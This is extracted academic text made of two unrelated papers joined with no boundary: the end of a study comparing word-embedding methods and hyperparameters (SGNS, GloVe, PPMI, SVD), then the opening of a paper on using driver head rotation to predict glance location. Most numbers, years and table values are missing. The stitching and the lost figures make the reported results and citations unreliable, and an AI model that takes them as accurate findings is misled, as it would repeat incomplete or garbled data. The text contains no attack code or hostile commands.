their validity based on the re- sults in table . are embeddings superior to count-based dis- tributional methods? it is commonly believed that modern prediction-based embeddings per- form better than traditional count-based methods. this claim was recently supported by a series of systematic evaluations by baroni et al. ( ). however, our results suggest a different trend. 
ta- ble shows that in word similarity tasks, the av- erage score of sgns is actually lower than svd’s when win = , , and it never outperforms svd word vec.googlecode.com/svn/trunk/ demo-train-big-model-v .sh we note that all conclusions drawn in this section rely on the specific data and settings with which we experiment. it is indeed feasible that experiments on different tasks, data, and hyperparameters may yield other conclusions. by more than . points in those cases. in google’s analogies sgns and glove indeed perform bet- ter than ppmi, but only by a margin of . points (compare ppmi with win = and sgns with win = ). msr’s analogy dataset is the only case where sgns and glove substantially outperform ppmi and svd. overall, there does not seem to be a consistent significant advantage to one ap- proach over the other, thus refuting the claim that prediction-based methods are superior to count- based approaches. the contradictory results in (baroni et al., ) stem from creating word vec embed- dings with somewhat pre-tuned hyperparameters (recommended by word vec), and comparing them to “vanilla” ppmi and svd representa- tions. in particular, shifted pmi (negative sam- pling) and context distribution smoothing (cds = . , equation ( ) in section . ) were turned on for sgns, but not for ppmi and svd. an additional difference is baroni et al.’s setting of eig= , which significantly deteriorates svd’s performance (see section . ). is glove superior to sgns? pennington et al. ( ) show a variety of experiments in which glove outperforms sgns (among other meth- ods). however, our results show the complete op- posite. in fact, sgns outperforms glove in every task (table ). only when restricted to cosadd, a suboptimal configuration, does glove show a . point advantage over sgns. this trend persists when scaling up to a larger corpus and vocabulary. this contradiction can be explained by three major differences in the experimental setup. first, in our experiments, hyperparameters were allowed to vary; in particular, w+c was applied to all the methods, including sgns. secondly, pennington et al. ( ) only evaluated on google’s analo- gies, but not on msr’s. finally, in our work, all methods are compared using the same underlying corpus. it is also important to bear in mind that, by definition, glove cannot use two hyperparame- ters: shifted pmi (neg) and context distribution smoothing (cds). instead, glove learns a set of bias parameters that subsumes these two modifica- tions and many other potential changes to the pmi metric. albeit its greater flexibility, glove does not fair better than sgns in our experiments. unlike ppmi, svd underperforms in both analogy tasks. is ppmi on-par with sgns on analogy tasks? levy and goldberg ( b) show that ppmi and sgns perform similarly on both google’s and msr’s analogy tasks. nevertheless, the results in table show a clear advantage to sgns. while the gap on google’s analogies is not very large (ppmi lags behind sgns by only . points), sgns consistently outperforms ppmi by a large margin on the msr dataset. msr’s analogy dataset captures syntactic relations, such as singular-plural inflections for nouns and tense modifications for verbs. we conjecture that cap- turing these syntactic relations may rely on certain types of contexts, such as determiners and func- tion words, which sgns might be better at cap- turing – perhaps due to the way it assigns weights to different examples, or because it also captures negative correlations which are filtered by ppmi. 
a deeper look into levy and goldberg’s ( b) experiments reveals the use of ppmi with positional contexts (i.e. each context is a conjunc- tion of a word and its relative position to the target word), whereas sgns was employed with regular bag-of-words contexts. positional contexts might contain relevant information for recovering syn- tactic analogies, explaining ppmi’s relatively high score on msr’s analogy task in (levy and gold- berg, b). does cosmul recover more analogies than cosadd? levy and goldberg ( b) show that using similarity multiplication ( cosmul) rather than addition ( cosadd) improves results on all methods and on every task. this claim is consistent with our findings; indeed, cosmul dominates cosadd in every case. the improve- ment is particularly noticeable for svd and ppmi, which considerably underperform other methods when using cosadd. . comparison with cbow another algorithm featured in word vec is cbow. unlike the other methods, cbow cannot be easily expressed as a factorization of a word- context matrix; it ties together the tokens of each context window by representing the context vec- tor as the sum of its words’ vectors. it is thus more expressive than the other methods, and has a po- tential of deriving better word representations. while mikolov et al. ( b) found sgns to outperform cbow, baroni et al. ( ) reports that cbow had a slight advantage. we com- win eig average performance . . . . . . . . . . . . table : the average performance of svd on word similarity tasks given different values of eig, in the vanilla scenario. pared cbow to the other methods when setting all the hyperparameters to the defaults provided by word vec (table ). with the exception of msr’s analogy task, cbow is not the best- performing method of any other task in this sce- nario. other scenarios showed similar trends in our preliminary experiments. while cbow can potentially derive better rep- resentations by combining the tokens in each con- text window, this potential is not realized in prac- tice. nevertheless, melamud et al. ( ) show that capturing joint contexts can indeed improve performance on word similarity tasks, and we be- lieve it is a direction worth pursuing. hyperparameter analysis we analyze the individual impact of each hyper- parameter, and try to characterize the conditions in which a certain setting is beneficial. . harmful configurations certain hyperparameter settings might cripple the performance of a certain method. we observe two scenarios in which svd performs poorly. svd does not benefit from shifted ppmi. set- ting neg > consistently deteriorates svd’s per- formance. levy and goldberg ( c) made a similar observation, and hypothesized that this is a result of the increasing number of zero-cells, which may cause svd to prefer a factorization that is very close to the zero matrix. svd’s l ob- jective is unweighted, and it does not distinguish between observed and unobserved matrix cells. using svd “correctly” is bad. the traditional way of representing words with svd uses the eigenvalue matrix (eig = ): w = ud · Σd. de- spite being theoretically well-motivated, this set- ting leads to very poor results in practice, when compared to other settings (eig = . or ). ta- ble demonstrates this gap. the drop in average accuracy when setting eig = is astounding. the performance gap persists under different hyperparameter settings as well, and drops in performance of over points (absolute) when using eig = instead of eig = . or are not uncommon. 
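to make the eig variants concrete, the weighting applied to the svd output can be written with a single exponent p on the singular-value matrix; a minimal sketch with names of our choosing:

```python
import numpy as np

def weighted_svd_vectors(u_d, s_d, p=0.5):
    """Eigenvalue weighting: W = U_d * Sigma_d**p.
    p = 1.0 is the 'traditional' factorization (eig = 1), which performs poorly here;
    p = 0.5 and p = 0.0 are the symmetric variants that work much better empirically."""
    return u_d * (s_d ** p)   # s_d is the 1-d array of the top d singular values

# the three settings explored in this work:
# w_eig0  = weighted_svd_vectors(u_d, s_d, p=0.0)   # dismiss the eigenvalues entirely
# w_eig05 = weighted_svd_vectors(u_d, s_d, p=0.5)   # symmetric square-root weighting
# w_eig1  = weighted_svd_vectors(u_d, s_d, p=1.0)   # traditional SVD/LSA weighting
```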
this setting is one of the main reasons for svd’s inferior results in the study by baroni et al. ( ), and also the reason we chose to use eig = . as the default setting for svd in the vanilla scenario. . beneficial configurations to identify which hyperparameter settings are beneficial, we looked at the best configuration of each method on each task. we then counted the number of times each hyperparameter setting was chosen in these configurations (table ). some trends emerge, such as ppmi and svd’s prefer- ence towards shorter context windows (win = ), and that sgns always prefers numerous nega- tive samples (neg > ). to get a closer look and isolate the effect of each hyperparameter, we controlled for said hy- perparameter, and compared the best configura- tions given each of the hyperparameter’s settings. table shows the difference between default and non-default settings of each hyperparameter. while many hyperparameter settings can im- prove performance, they may also degrade it when chosen incorrectly. for instance, in the case of shifted pmi (neg), sgns consistently profits from neg > , while svd’s performance is dra- matically reduced. for ppmi, the utility of ap- plying neg > depends on the type of task: word similarity or analogy. another example is dynamic context windows (dyn), which is benefi- cial for msr’s analogy task, but largely detrimen- tal to other tasks. it appears that the only hyperparameter that can be “blindly” applied in any situation is context distribution smoothing (cds = . ), yielding a consistent improvement at an insignificant risk. note that cds helps ppmi more than it does other methods; we suggest that this is because it re- duces the relative impact of rare words on the dis- tributional representation, thus addressing pmi’s “achilles’ heel”. this might also relate to pmi’s bias towards infrequent events (see section . ). broader windows create more ran- dom co-occurrences with rare words, “polluting” the distribu- tional vector with random words that have high pmi scores. practical recommendations it is generally advisable to tune all hyperparam- eters, as well as algorithm-specific hyperparame- ters, for the task at hand. however, this may be computationally expensive. we thus provide some “rules of thumb”, which we found to work well in our setting: • always use context distribution smoothing (cds = . ) to modify pmi, as described in section . . it consistently improves performance, and is applicable to ppmi, svd, and sgns. • do not use svd “correctly” (eig = ). instead, use one of the symmetric variants (section . ). • sgns is a robust baseline. while it might not be the best method for every task, it does not signif- icantly underperform in any scenario. moreover, sgns is the fastest method to train, and cheapest (by far) in terms of disk space and memory con- sumption. • with sgns, prefer many negative samples. • for both sgns and glove, it is worthwhile to ex- periment with the ~w +~c variant, which is cheap to apply (does not require retraining) and can result in substantial gains (as well as substantial losses). conclusions recent embedding methods introduce a plethora of design choices beyond network architecture and optimization algorithms. we reveal that these seemingly minor variations can have a large im- pact on the success of word representation meth- ods. 
by showing how to adapt and tune these hyperparameters in traditional methods, we allow a proper comparison between representations, and challenge various claims of superiority from the word embedding literature. this study also exposes the need for more controlled-variable experiments, and for extending the concept of "variable" from the obvious task, data, and method to the often-ignored preprocessing steps and hyperparameter settings. we also stress the need for transparent and reproducible experiments, and commend authors such as mikolov, pennington, and others for making their code publicly available. in this spirit, we make our code available as well, at http://bitbucket.org/omerlevy/hyperwords.

table: the impact of each hyperparameter, measured by the number of tasks in which the best configuration had that hyperparameter setting, for each of ppmi, svd, sgns, and glove and for the hyperparameters win, dyn, sub, neg, cds, and w+c; non-applicable combinations are marked by "—". [cell counts not recoverable.]

table: the added value versus the risk of setting each hyperparameter, reported as the performance differences between the best achievable configurations when restricting a hyperparameter to different values, across the word-similarity and analogy datasets. [cell values not recoverable.] sub-tables: (a) dyn = with versus dyn = none; (b) sub = dirty versus sub = none; (c) neg > 1 versus neg = 1; (d) cds = 0.75 versus cds = 1; (e) w+c = w + c versus w+c = only w. this difference indicates the potential gain of tuning a given hyperparameter, as well as the risk of decreased performance when not tuning it. for example, an entry of + .
% in table (d) means that the best model with cds = . is . % more accurate (absolute) than the best model with cds = ; i.e. on msr’s analogies, using cds = . instead of cds = improved ppmi’s accuracy from . to . . acknowledgements this work was supported by the google research award program and the german research foun- dation via the german-israeli project cooperation (grant da / - ). we thank marco baroni and jeffrey pennington for their valuable comments. references eneko agirre, enrique alfonseca, keith hall, jana kravalova, marius pasca, and aitor soroa. . a study on similarity and relatedness using distribu- tional and wordnet-based approaches. in proceed- ings of human language technologies: the annual conference of the north american chap- ter of the association for computational linguistics, pages – , boulder, colorado, june. association for computational linguistics. marco baroni and alessandro lenci. . dis- tributional memory: a general framework for corpus-based semantics. computational linguis- tics, ( ): – . marco baroni, georgiana dinu, and germán kruszewski. . dont count, predict! a systematic comparison of context-counting vs. context-predicting semantic vectors. in proceedings of the nd annual meeting of the association for computational linguistics (volume : long papers), pages – , baltimore, maryland, june. association for computational linguistics. yoshua bengio, réjean ducharme, pascal vincent, and christian jauvin. . a neural probabilistic lan- guage model. journal of machine learning re- search, : – . elia bruni, gemma boleda, marco baroni, and nam khanh tran. . distributional semantics in technicolor. in proceedings of the th annual meeting of the association for computational lin- guistics (volume : long papers), pages – , jeju island, korea, july. association for computa- tional linguistics. john a bullinaria and joseph p levy. . extracting semantic representations from word co-occurrence statistics: a computational study. behavior research methods, ( ): – . john a bullinaria and joseph p levy. . extracting semantic representations from word co-occurrence statistics: stop-lists, stemming, and svd. behavior research methods, ( ): – . john caron. . experiments with lsa scor- ing: optimal rank and basis. in proceedings of the siam computational information retrieval work- shop, pages – . kenneth ward church and patrick hanks. . word association norms, mutual information, and lexicog- raphy. computational linguistics, ( ): – . ronan collobert and jason weston. . a unified architecture for natural language processing: deep neural networks with multitask learning. in pro- ceedings of the th international conference on machine learning, pages – . scott c. deerwester, susan t. dumais, thomas k. lan- dauer, george w. furnas, and richard a. harshman. . indexing by latent semantic analysis. jasis, ( ): – . c eckart and g young. . the approximation of one matrix by another of lower rank. psychome- trika, : – . roi reichart felix hill and anna korhonen. . simlex- : evaluating semantic models with (genuine) similarity estimation. arxiv preprint arxiv: . . adriano ferraresi, eros zanchetta, marco baroni, and silvia bernardini. . introducing and evaluating ukwac, a very large web-derived corpus of english. in proceedings of the th web as corpus workshop (wac- ), pages – . lev finkelstein, evgeniy gabrilovich, yossi matias, ehud rivlin, zach solan, gadi wolfman, and ey- tan ruppin. . placing search in context: the concept revisited. 
acm transactions on informa- tion systems, ( ): – . yoav goldberg and omer levy. . word vec explained: deriving mikolov et al.’s negative- sampling word-embedding method. arxiv preprint arxiv: . . zellig harris. . distributional structure. word, ( ): – . omer levy and yoav goldberg. a. dependency- based word embeddings. in proceedings of the nd annual meeting of the association for computa- tional linguistics (volume : short papers), pages – , baltimore, maryland. omer levy and yoav goldberg. b. linguistic regularities in sparse and explicit word representa- tions. in proceedings of the eighteenth confer- ence on computational natural language learning, pages – , baltimore, maryland. omer levy and yoav goldberg. c. neural word embeddings as implicit matrix factorization. in ad- vances in neural information processing systems : annual conference on neural information pro- cessing systems , december - , mon- treal, quebec, canada, pages – . minh-thang luong, richard socher, and christo- pher d. manning. . better word representa- tions with recursive neural networks for morphol- ogy. in proceedings of the seventeenth confer- ence on computational natural language learning, pages – , sofia, bulgaria, august. associa- tion for computational linguistics. oren melamud, ido dagan, jacob goldberger, idan szpektor, and deniz yuret. . probabilistic modeling of joint-context in distributional similar- ity. in proceedings of the eighteenth conference on computational natural language learning, pages – , baltimore, maryland, june. association for computational linguistics. tomas mikolov, kai chen, gregory s. corrado, and jeffrey dean. a. efficient estimation of word representations in vector space. in proceedings of the international conference on learning represen- tations (iclr). tomas mikolov, ilya sutskever, kai chen, gregory s. corrado, and jeffrey dean. b. distributed rep- resentations of words and phrases and their compo- sitionality. in advances in neural information pro- cessing systems, pages – . tomas mikolov, wen-tau yih, and geoffrey zweig. c. linguistic regularities in continuous space word representations. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – . sebastian padó and mirella lapata. . dependency-based construction of semantic space models. computational linguistics, ( ): – . patrick pantel and dekang lin. . discovering word senses from text. in proceedings of the eighth acm sigkdd international conference on knowl- edge discovery and data mining, pages – . acm. jeffrey pennington, richard socher, and christopher manning. . glove: global vectors for word representation. in proceedings of the con- ference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. association for computational lin- guistics. kira radinsky, eugene agichtein, evgeniy gabrilovich, and shaul markovitch. . a word at a time: computing word relatedness using temporal semantic analysis. in proceedings of the th international conference on world wide web, pages – . acm. magnus sahlgren. . the word-space model. ph.d. thesis, stockholm university. peter d. turney and michael l. littman. . mea- suring praise and criticism: inference of semantic orientation from association. transactions on infor- mation systems, ( ): – . peter d. turney and patrick pantel. . from frequency to meaning: vector space models of se- mantics. journal of artificial intelligence research, ( ): – . 
peter d. turney. . domain and function: a dual- space model of semantic relations and compositions. journal of artificial intelligence research, : – . torsten zesch, christof müller, and iryna gurevych. . using wiktionary for computing semantic relatedness. in proceedings of the rd national conference on artificial intelligence - volume , aaai’ , pages – . aaai press. submitted august accepted january published february corresponding author joonbum lee, joonbum@mit.edu academic editor ana maguitman additional information and declarations can be found on page doi . /peerj-cs. copyright lee et al. distributed under creative commons cc-by . open access investigating the correspondence between driver head position and glance location joonbum lee , mauricio muñoz , , , lex fridman , trent victor , bryan reimer and bruce mehler agelab and new england university transportation center, massachusetts institute of technology, cambridge, ma, united states of america technical university of munich, munich, germany university of augsburg, augsburg, germany safer vehicle and traffic safety center, chalmers, göteborg, sweden abstract the relationship between a driver’s glance orientation and corresponding head rotation is highly complex due to its nonlinear dependence on the individual, task, and driving context. this paper presents expanded analytic detail and findings from an effort that explored the ability of head pose to serve as an estimator for driver gaze by connecting head rotation data with manually coded gaze region data using both a statistical analysis approach and a predictive (i.e., machine learning) approach. for the latter, classification accuracy increased as visual angles between two glance locations increased. in other words, the greater the shift in gaze, the higher the accuracy of classification. this is an intuitive but important concept that we make explicit through our analysis. the highest accuracy achieved was % using the method of hidden markov models (hmm) for the binary gaze classification problem of (a) glances to the forward roadway versus (b) glances to the center stack. results suggest that although there are individual differences in head-glance correspondence while driving, classifier models based on head-rotation data may be robust to these differences and therefore can serve as reasonable estimators for glance location. the results suggest that driver head pose can be used as a surrogate for eye gaze in several key conditions including the identification of high-eccentricity glances. inexpensive driver head pose tracking may be a key element in detection systems developed to mitigate driver distraction and inattention. subjects human-computer interaction, data mining and machine learning keywords head movements, glance classification, head-glance correspondence, driver distraction introduction eye movements have long been studied in the context of driver behavior, attention management, and task related visual demand assessment (e.g., wierwille, ). as driver distraction has become identified as one of the leading causes of vehicle crashes (national highway traffic safety administration, ; statistic brain, ), eye-tracking systems have been employed in numerous studies in the field of driving safety and driver visual attention allocation (e.g., wang et al., ). evaluating objective data on glance behavior, such as glance location (e.g., glance to the road, glance away from the road, etc.) 
and duration (e.g., mean of single glance duration, total glance time to a specific location, how to cite this article lee et al. ( ), investigating the correspondence between driver head position and glance location. peerj com- put. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:joonbum@mit.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. etc.) has been seen as key to understanding driver interaction with in-vehicle devices and to estimate potential crash risks. for example, several studies show that crash and near-crash risk increased as the duration of off-road glances increased (e.g., liang, lee & yekhshatyan, ; victor et al., ). however, traditional technologies for automated eye-tracking have been susceptible to data quality issues (ahlstrom et al., ; sodhi, reimer & llamazares, ) and difficult to reliably use in production systems, especially for on-road experiments and naturalistic driving studies. for these reasons, research on the correspondence between eye and head movement (which is relatively more robust to track in the presence of occlusion and movement artifact) have been conducted, and results suggest that head pose data may be useful as a surrogate for eye-glance data (e.g., talamonti et al., ; talamonti, kochhar & tijerina, ; tawari, chen & trivedi, ; vicente et al., ), although there may be issues as well. talamonti and colleagues ( ) found a low likelihood ( % or less) of head turns when glancing to the instrument panel and rearview mirror, and high likelihood ( % or more) when glancing to the left mirror, center console, and center stack. also, talamonti, kochhar & tijerina ( ) suggested that driver-specific thresholds need to be set in order to meaningfully use head yaw data as a glance predictor. these studies utilized a fixed-base driving simulator to collect data and applied a simple classifier to understand the relationship between head turns and glance locations. tawari, chen & trivedi ( ) and vicente et al. ( ) applied more advanced approaches, extracting facial features and landmarks to estimate gaze regions while driving a real car, but they did not focus on driver distraction aspects (e.g., completing secondary tasks while driving), which have critical safety implications. the present paper presents expanded analytic detail and findings from an effort that was developed to further explore whether head-rotation data can be used as a surrogate for eye-glance behaviors in an on-road environment where eye-tracking is more challenging compared to laboratory experiments (muñoz et al., ). this analysis took advantage of glance and head rotation data drawn from a study conducted by the virginia tech transportation institute (transportation research board, ); the glance data were manually coded for glance region and temporal points where glance orientation transition from one location to another by two independent coders (and a senior research associated mediated if disagreement occurred between two coders), and head rotation data were estimated from manually extracted facial landmarks (details are described in the ‘method’ section). 
This study utilized the data to: (a) begin developing a deeper understanding of how drivers rotate their heads, (b) generate input features for classifiers that predicted glance allocations, and (c) investigate individual differences in head-glance correspondence. Based on the literature noted above, it was expected that head-rotation data could be used to predict some, but not all, glances away from the road. In the field of driver distraction evaluation, glances away from the road and glances to task-related areas such as displays are particularly important to measure (Driver Focus-Telematics Working Group, ; National Highway Traffic Safety Administration, ). Therefore, we tested whether head rotation can predict glances to the forward road, to the vehicle's center stack (e.g., climate controls, infotainment display), and to other key locations in the vehicle (e.g., mirrors, see Li & Busso, ). Subsequent efforts then evaluated the degree to which machine learning algorithms could predict glances to closer and farther regions of the vehicle interface, and the degree to which individual differences influence behavior. The main objective of this study is to investigate the use of head pose data to predict glance location with on-road driving data. To achieve this, we analyze the data using principal component analysis (PCA) and machine learning techniques, considering several factors that may affect model performance and interpretation. Classification performance is a direct result of three principal factors: (a) the quantity and "shape" (e.g., uneven class membership, skewness, etc.) of the data, (b) the modeling methodology utilized, and (c) the descriptive potential (i.e., signal power) of the selected features. We consider results based on the original "skewed" dataset, which is characterized by a heavily uneven distribution of samples for each glance type ( % of all glances were forward glances), as well as a subset of the original dataset with an equal amount of glance samples for each type of glance. Furthermore, in terms of model selection, there is a wide range of classifiers that could be selected from. As a secondary assessment of the viability of different classification approaches, four classifiers were examined to cover a wide range of data interpretation paradigms. These steps allow us to reasonably begin to isolate the descriptive potential of the head pose signal and a set of classification approaches that appear most promising for future endeavors targeting larger, more sophisticated datasets or systems for real-time state assessment. Subsequent sections describe details of the data and model development.

Methods
As previously noted, this study is a secondary analysis of a subset of data collected by the Virginia Tech Transportation Institute (VTTI) in support of the Strategic Highway Research Program (SHRP) Naturalistic Driving Study (Transportation Research Board, ). The data were provided to the MIT AgeLab under an IRB-approved data sharing agreement. A number of the following details concerning the source dataset are drawn from a technical report (J Sudweeks, A Sarkar & A Plummer, unpublished data) prepared by VTTI for the SHRP program. Participants were initially recruited to ensure that the dataset represented a wide array of facial geometry.
participants who met the study’s eligibility criteria were assigned to participate in either static trials (e.g., data collected while not driving) or dynamic trials (e.g., data collected while driving). a total of participants were available ( participants for static trials and participants for dynamic trials). the sample spans four age groups ( – , – , – , and over , with a majority of cases falling in the first two groups) and consisted of males and females. data were collected in a saab - instrumented with a data acquisition system to collect a number of metrics, including digital video of the driver’s face. the video was recorded by a camera mounted below the rearview mirror. a previous brief report from our group (muñoz et al., ) showed a number of differences in the distributions of head rotations associated with glances to the road and center cluster between the static and dynamic samples. consequently, the data from the participants from the dynamic trials make up the focus of this analysis since actual on-road behavior is our primary interest. lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. test trials the dynamic trials were conducted on a predefined route around blacksburg, virginia. this route was approximately miles in length and consisted of various road types (e.g., two lane road, residential, rural, and divided highway). during the driving session, which usually lasted between to min, participants were instructed to perform five basic tasks, each of which was performed once: (a) report current vehicle speed, (b) indicate if any vehicles are immediately adjacent to the test vehicle, (c) turn the radio on and then off, (d) locate the cell phone in the center console, and (e) complete a brief simulated cell phone conversation. participants were accompanied by an in-vehicle experimenter who instructed participants to conduct each of the tasks at a safe time at roughly the same location on the route. data reduction video of each task/glance was recorded at frames per second and decomposed into frames for analysis. each video frame was annotated by two independent analysts who labeled seven predefined facial landmarks: (a) outer corner of the participant’s right eye, (b) inner corner of the participant’s right eye, (c) outer corner of the participant’s left eye, (d) inner corner of the participant’s left eye, (e) the tip of the participant’s nose, (f) the right corner of the participant’s mouth, and (g) the left corner of the participant’s mouth. two analysts’ x and y pixel coordinates for each landmark were averaged, and if the average frame pixel correction exceeded . pixels, the frame was considered as a significant disagreement between two analysts, and was excluded from the rotation estimate dataset. if either analyst could not make a reliable annotation, the landmark was marked as ‘‘missing,’’ and the frame was excluded from the rotation estimate dataset. for each video frame, geometric methods (e.g., murphy-chutorian & trivedi, ; gee & cipolla, ; horprasert, yacoob & davis, ), which utilize feature locations (e.g., eyes, mouth, and nose tip), configurations of the facial features, basic ratios between feature locations (e.g., ratio between binocular width and vertical distance from lit to midpoint between eyes), etc. were used for head rotation estimation. the head pose data consisted of three rotation estimates (i.e., x, y and z rotation). figure shows a rotation coordinate system. 
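As a concrete illustration of the landmark-averaging and frame-exclusion rules described above, a minimal sketch is given below (Python/NumPy). It is not the VTTI reduction code: the in-memory layout (one (7, 2) coordinate array per analyst per frame) and the disagreement threshold are assumptions made for illustration, since the actual pixel value is not preserved in this text.

```python
# Minimal sketch of the frame-level data reduction described above: average the two
# analysts' landmark annotations and exclude frames with missing landmarks or with
# too much disagreement. Threshold and data layout are illustrative assumptions.
import numpy as np

DISAGREEMENT_THRESHOLD_PX = 2.5  # placeholder; not the study's actual value

def reduce_frame(analyst_a, analyst_b, threshold=DISAGREEMENT_THRESHOLD_PX):
    """Combine two analysts' annotations for one video frame.

    analyst_a, analyst_b: (7, 2) arrays of x/y pixel coordinates for the seven
    predefined facial landmarks; NaN marks a landmark an analyst could not label.
    Returns the averaged (7, 2) landmark array, or None if the frame is excluded.
    """
    a = np.asarray(analyst_a, dtype=float)
    b = np.asarray(analyst_b, dtype=float)

    # Exclude the frame if either analyst marked any landmark as "missing".
    if np.isnan(a).any() or np.isnan(b).any():
        return None

    # Average per-landmark disagreement (Euclidean distance) over the frame.
    disagreement = np.linalg.norm(a - b, axis=1).mean()
    if disagreement > threshold:
        return None  # significant disagreement between the two analysts

    return (a + b) / 2.0
```

Frames for which the function returns None would simply be dropped from the rotation-estimate dataset, mirroring the exclusion rules described above.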
glance locations were coded by trained video analysts on a frame-by-frame basis into one of locations: forward, left forward, right forward, rearview mirror, left window/mirror, right window/mirror, over-the-shoulder, instrument cluster, center stack, cell phone, interior object, passenger, no eyes visible—glance location unknown, no eyes visible—eyes are off-road, eyes closed, and other (e.g., any glance that cannot be categorized using the above codes). figure shows of the glance locations. a senior analyst reviewed the output of the coding and provided feedback to the less-experienced analyst. glance allocations for each subject and task were merged with head rotation data using timestamps. model training and validation training data were derived from the dataset by taking all data belonging to a randomly sampled subset of the subjects ( %). the data from the remaining subjects ( %) were used to build a validation dataset. as one of the tested classifiers (the hidden markov model), lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure head rotation coordinate system. (a) rotation x: pitch, (b) rotation y : yaw, and (c) rota- tion z: roll. full-size doi: . /peerjcs. /fig- figure glance locations for the manual coding. full-size doi: . /peerjcs. /fig- takes the temporal structure of the input data into account, the timestamp ordering of the samples for each subject were maintained. all rotation variables were normalized by computing their individual z-scores per participant. the performance measures reported in the result section were computed using this normalization method. furthermore, to discount any potential bias inherent in how subjects are sampled, a monte-carlo sampling lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. technique was used (muñoz et al., ; muñoz et al., ). for each of iterations of this sampling approach, training and validation test sets were generated as above. all models were trained, and performance values were then computed for each classifier as the mean of each performance metric (standard accuracy, f score, and kappa value) over all iterations. one key issue considered is the unbalanced class structure (i.e., skewness) of the dataset, as glances to the forward roadway heavily outnumber glances to any other single location within the vehicle. for instance, out of all the glances to the forward roadway and center stack, approximately % belong to the former class (the forward roadway). random subsampling was used to prune away the over-represented glance locations in the data. data exploration the intrinsic discriminative quality of the data plays a crucial role in any classification framework (i.e., classification may be difficult in datasets in which classes overlap strongly in feature space). therefore, pca (jolliffe, ) was applied for representing the raw data in terms of its underlying structural patterns, computing the covariance matrix across all variables, and extracting the eigenvectors of this matrix. given this information, which characterizes how statistical variance is distributed amongst (linear) combinations of variables, this analysis can identify and visualize properties that might have an impact on classification performance, in particular which variables are most likely to contribute to a high classification accuracy. 
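To make the training/validation procedure and the data exploration above concrete, the following is a hypothetical Python sketch (NumPy, pandas, scikit-learn) rather than the study's own implementation: it z-scores the three rotation signals per participant, inspects PCA loadings and explained variance, and runs a subject-wise Monte Carlo loop that balances the two glance classes by random subsampling, fits three stand-in classifiers, and averages accuracy, F1 score, and Cohen's kappa over iterations. The column names, iteration count, train fraction, and model parameters are assumptions for illustration, and the HMM used in the study is omitted here.

```python
# Hypothetical sketch of the exploration/evaluation pipeline described above. `df` is
# assumed to hold one row per frame with columns: 'subject', 'rot_x', 'rot_y', 'rot_z'
# and 'glance' (e.g., 'forward' vs. 'center_stack'). All settings are placeholders.
import numpy as np
import pandas as pd
from sklearn.decomposition import PCA
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import accuracy_score, f1_score, cohen_kappa_score

ROTS = ["rot_x", "rot_y", "rot_z"]

def zscore_per_subject(df):
    # Normalize each rotation signal within each participant.
    out = df.copy()
    out[ROTS] = df.groupby("subject")[ROTS].transform(lambda s: (s - s.mean()) / s.std())
    return out

def inspect_pca(df):
    # Which (linear combinations of) rotations carry most of the variance?
    pca = PCA(n_components=3).fit(df[ROTS])
    print("explained variance ratio:", pca.explained_variance_ratio_)
    print("loadings (rows = components):\n", pca.components_)

def monte_carlo_eval(df, n_iter=20, train_frac=0.7, seed=0):
    rng = np.random.default_rng(seed)
    models = {
        "knn": lambda: KNeighborsClassifier(n_neighbors=5),
        "rf": lambda: RandomForestClassifier(n_estimators=100, random_state=0),
        "mlp": lambda: MLPClassifier(hidden_layer_sizes=(16,), max_iter=500, random_state=0),
    }
    scores = {name: [] for name in models}
    subjects = df["subject"].unique()
    for _ in range(n_iter):
        # Sample whole subjects, so no participant appears in both sets.
        train_subj = rng.choice(subjects, size=int(len(subjects) * train_frac), replace=False)
        train = df[df["subject"].isin(train_subj)]
        test = df[~df["subject"].isin(train_subj)]
        # Balance the training classes by random subsampling of the larger class.
        n_min = train["glance"].value_counts().min()
        train = (train.groupby("glance", group_keys=False)
                      .apply(lambda g: g.sample(n=n_min, random_state=0)))
        for name, make in models.items():
            clf = make().fit(train[ROTS], train["glance"])
            pred = clf.predict(test[ROTS])
            scores[name].append((
                accuracy_score(test["glance"], pred),
                f1_score(test["glance"], pred, pos_label="center_stack"),
                cohen_kappa_score(test["glance"], pred),
            ))
    # Mean (accuracy, F1, kappa) per classifier across iterations.
    return {name: np.mean(vals, axis=0) for name, vals in scores.items()}
```

Because whole subjects, rather than individual frames, are assigned to the training or validation side of each split, no participant contributes data to both, which is the property the Monte Carlo procedure described above is designed to preserve.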
as explained in ‘principal component analysis’, in this context we use pca to reduce the dimensionality of the data from three dimensions (rotations in x,y ,z axes) to two dimensions and to examine which linear combinations of these rotations contribute most towards discriminating between glances to the center stack and forward roadway/right mirror. model development the classification methods presented in this paper are (a) k-nearest neighbor, (b) random forest, (c) multilayer perceptron, and (d) hidden markov models. implementations for all but the latter were taken from opencvc++ library v. . . , using default parameter settings unless otherwise noted. the hmm implementation was taken from matlab ( ). the parameters of each model were determined empirically with an experimental validation set (i.e., a random subset of the larger data pool). these methods were chosen based on the trade-off in running time, space complexity, and difficulty of parameter tuning. the k-nearest neighbor (knn) algorithm has the lowest number of parameters (k, the number of neighbors to consider, and the distance metric to evaluate between points) and arguably the highest space and running time complexity requirements during evaluation, but is very fast during training. the random forest classifier (breiman, ) is a representative ensemble method with high space complexity requirements both for training and evaluation, but unlike knn it is both fast to train and fast to evaluate. random forest uses a random subset of each input sample at different nodes to train sets of weak learners. this has the added benefit that as training progresses, variables with low information content are automatically filtered out, thus making the classifier especially lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. well-suited for data structured across heterogeneous input variables. the main parameters that require tuning are the number trees in the forest, the depth of the trees (usually kept constant across all trees), and the function used to split nodes of each tree. the multilayer perceptron (mlp) was taken as a representative of the larger class of artificial neural networks (ann) for their ability to model non-linear relationships between data points. mlp space complexity is low for both training and evaluation, while running time is slow for training and 